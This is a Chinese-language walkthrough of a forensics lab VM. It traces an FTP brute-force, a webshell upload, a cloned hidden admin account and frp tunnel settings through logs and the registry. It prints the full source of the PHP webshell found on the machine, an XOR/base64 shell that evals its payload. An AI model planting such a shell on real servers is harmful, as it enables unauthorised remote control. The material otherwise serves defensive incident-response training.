靶机信息

下载方式

阿里云盘:https://www.alipan.com/s/ne3YeyhXGqa

提取码:a7i8

文件大小:6.69GB

靶机启动

使用Vmware启动即可，如启动错误，请升级至Vmware17.5以上

靶机背景

前景需要：小李在某单位驻场值守，深夜12点，甲方已经回家了，小李刚偷偷摸鱼后，发现安全设备有告警，于是立刻停掉了机器开始排查。

这是他的服务器系统，请你找出以下内容，并作为通关条件：

1.攻击者的IP地址（两个）？

2.攻击者的webshell文件名？

3.攻击者的webshell密码？

4.攻击者的伪QQ号？

5.攻击者的伪服务器IP地址？

6.攻击者的服务器端口？

7.攻击者是如何入侵的（选择题）？

8.攻击者的隐藏用户名？

靶机账户

账号 --> Administrator
密码 --> Zgsf@qq.com

打靶方式(思路)

1. 注册表

2. web日志

3. 系统日志

4. 服务日志

5. 存档存放

6. 代码分析

打靶实录(流程)

信息收集

简单看一下主机信息(也可以使用sysinfo)

​​

桌面上有一个解题脚本,看一下需要做什么

​​

攻击者的IP地址（两个）

要求给出攻击者ip地址,根据题目,我们有两点可以查看的位置

1. phpstudy搭建网站

2. IIS搭建网站

老规矩,先看phpstudy所搭建的网站日志信息 --> apache logs

右键桌面phpstudy --> 打开文件所在位置 --> C:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1709164800

映入眼帘的同样是很多目录扫描日志

​​

找一下成功的日志 --> 200状态码

​​

此处只有一个攻击ip --> 192.168.126.135

​​

那么继续查看存在的插件日志 --> C:\phpstudy_pro\Extensions

​​

下一个是FTP服务插件,查找一下该插件日志,也很明显 --> C:\phpstudy_pro\Extensions\FTP0.9.60\Logs\fzs-2024-02-29.log

​​

存在密码爆破操作

​​

翻到最下面,对方成功爆破密码,并且上传system.php --> 猜测为webshell

​​

简单看一下其他插件,均为空,那边便看看系统日志吧,先注意登陆操作日志

​​

此处发现有登陆行为 --> 192.168.126.129

攻击者的webshell文件名

利用D盾扫描web目录 --> C:\phpstudy_pro\WWW

​​

尝试提交文件名称 -->system.php

​​

攻击者的webshell密码

题干中没有该问题，因此无法提交,打开system.php查看webshell代码

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='hack6618';
$payloadName='payload';
$key='7813d1590d28a7dd';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
		eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

答案很明显 --> $pass='hack6618' --> hack6618

攻击者的QQ号

结合此前,存在黑客登录行为,直接进入攻击者目录查看蛛丝马迹

C:\Users\hack887$

黑客用户桌面上存在注册表修改痕迹

C:\Users\hack887$\Desktop

​​

注册表存在hack887$用户,预计为克隆administratoe

​​

黑客用户页面没有特别的发现,返回本机用户

在文档中发现存在Tencent Files文件 --> QQ存档位置

​​

QQ号 --> 777888999321

​​

攻击者的服务器伪IP地址

由于存在黑客QQ,怀疑利用QQ传输了可疑文件

C:\Users\Administrator\Documents\Tencent Files\777888999321\FileRecv

​​

黑客利用QQ传输了内网穿透工具Frp,查看客户端配置

C:\Users\Administrator\Documents\Tencent Files\777888999321\FileRecv\frp_0.54.0_windows_amd64\frp_0.54.0_windows_amd64\frpc.ini

[common]
server_addr = 256.256.66.88
server_port = 65536

服务器IP --> 256.256.66.88

攻击者的服务器端口

服务器端口 --> 65536

攻击者是如何入侵的（选择题）

查看选项

​​

由于攻击者利用ftp爆破上传webshell,因此我们选择 --> 3

​​

攻击者的隐藏用户名

查看系统登录日志时 --> rdp登录

查看攻击者蛛丝马迹时 --> 注册表

查看用户目录 --> C:\Users

攻击者隐藏用户名 --> hack887$

​​

打靶总结

设计很精巧的一台靶机,值得一试.